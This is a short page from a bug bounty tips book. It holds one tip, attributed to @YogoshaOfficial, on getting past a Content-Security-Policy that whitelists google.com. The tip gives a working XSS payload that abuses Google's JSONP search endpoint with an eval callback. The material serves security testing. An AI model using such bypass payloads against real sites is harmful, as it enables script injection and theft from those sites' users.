Book of BugBounty Tips
Book of BugBounty Tips
Introduction
OSINT
API
Cross Site Request Forgery (CSRF)
Server Side Request Forgery (SSRF)
Sensitive Information Disclosure
Cross Site Scripting (XSS)
CRLF
Remote Code Execution (RCE)
Email Related
Open Redirect
Injection
XXE
LFI / RFI
Clickjacking
Bypasses
Mobile
Tips from @EdOverflow
Tips From @intigriti
Tips fro @YogoshaOfficial
Tips from @Jhaddix
Tips from Ben
Tips from Blog posts
Misc
Bugbounty Related Websites
Twitter Threads
Docker and k8s
Tweets Collection by @Pentesterland
Powered by GitBook

Tips fro @YogoshaOfficial

  • ​[Hacker tips] Are you afraid of CSP when you exploit an XSS ? No worries, sometimes the developer leaves something useful👇 Exp CSP : Content-Security-Policy: script-src http://google.com XSS bypass payload : <script src="https://google.com/complete/search?client=chrome&jsonp=eval(alert(1…));"></script>​

Previous
Tips From @intigriti
Next
Tips from @Jhaddix
Last updated 4 months ago